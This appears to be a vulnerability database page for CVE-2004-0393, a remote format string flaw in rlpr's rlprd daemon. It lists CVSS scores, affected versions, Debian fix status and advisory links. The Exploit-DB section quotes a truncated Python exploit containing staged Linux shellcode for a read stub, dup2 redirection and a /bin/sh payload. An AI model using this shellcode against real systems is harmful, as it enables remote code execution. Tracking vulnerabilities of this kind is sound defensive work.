CVE-2004-0393
published 2004-12-06
CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in…
Priority P3 · 52 · critical · 10 · CVSS 2.0
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 17.43% (96.7th percentile)
Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | rlpr | < rlpr 2.02-7.1 (bookworm) | rlpr 2.02-7.1 (bookworm) |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
CVSS provenance
nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
osv · 10.0 · CRITICAL
vendor_debian · 10.0 · CRITICAL
GHSA
GHSA-mjcj-xgcf-w8x7: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
ghsa_unreviewed·2022-04-29
CVE-2004-0393 [HIGH] GHSA-mjcj-xgcf-w8x7: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
OSV
CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
osv·2004-12-06·CVSS 10.0
CVE-2004-0393 [CRITICAL] CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
Debian
CVE-2004-0393: rlpr - Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 al...
vendor_debian·2004·CVSS 10.0
CVE-2004-0393 [CRITICAL] CVE-2004-0393: rlpr - Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 al...
Scope: local
bookworm: resolved (fixed in 2.02-7.1)
bullseye: resolved (fixed in 2.02-7.1)
forky: resolved (fixed in 2.02-7.1)
sid: resolved (fixed in 2.02-7.1)
trixie: resolved (fixed in 2.02-7.1)
No detection rules found.
Exploit-DB
Rlpr 2.04 - 'msg()' Remote Format String
exploitdb·2004-06-25
CVE-2004-0393 Rlpr 2.04 - 'msg()' Remote Format String
---
```python
# by jaguar
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
    fd = None
    pad = 2
    #00000000 31DB xor ebx,ebx
    #00000002 F7E3 mul ebx
    #00000004 B003 mov al,0x3
    #00000006 80C304 add bl,0x4
    #00000009 89E1 mov ecx,esp
    #0000000B 4A dec edx
    #0000000C CC int3
    #0000000D CD80 int 0x80
    #0000000F FFE1 jmp ecx
    # read(4, esp, -1); jmp ecx
    lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
    lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
    # dup2 shellcode(4->0,1,2)
    lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
    lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
    # execute /bin/sh
    lnx_stage_two += "\x90" * 100
    lnx_stage_two += "\x31\xd2\x52\x68\x6
```
Exploit-DB
Rlpr 2.0 - 'msg()' Multiple Vulnerabilities
exploitdb·2004-06-19
CVE-2004-0393 Rlpr 2.0 - 'msg()' Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/10578/info
It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.
The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.
The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer.
rlpr versions 2.04 and prior are affected by these issues.
```python
#!/usr/bin/python
import os, sys, socket, struct, time, telnetli
```
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108810992313652&w=2
http://www.debian.org/security/2004/dsa-524
http://www.securityfocus.com/bid/10578
https://exchange.xforce.ibmcloud.com/vulnerabilities/16453
Published: 2004-12-06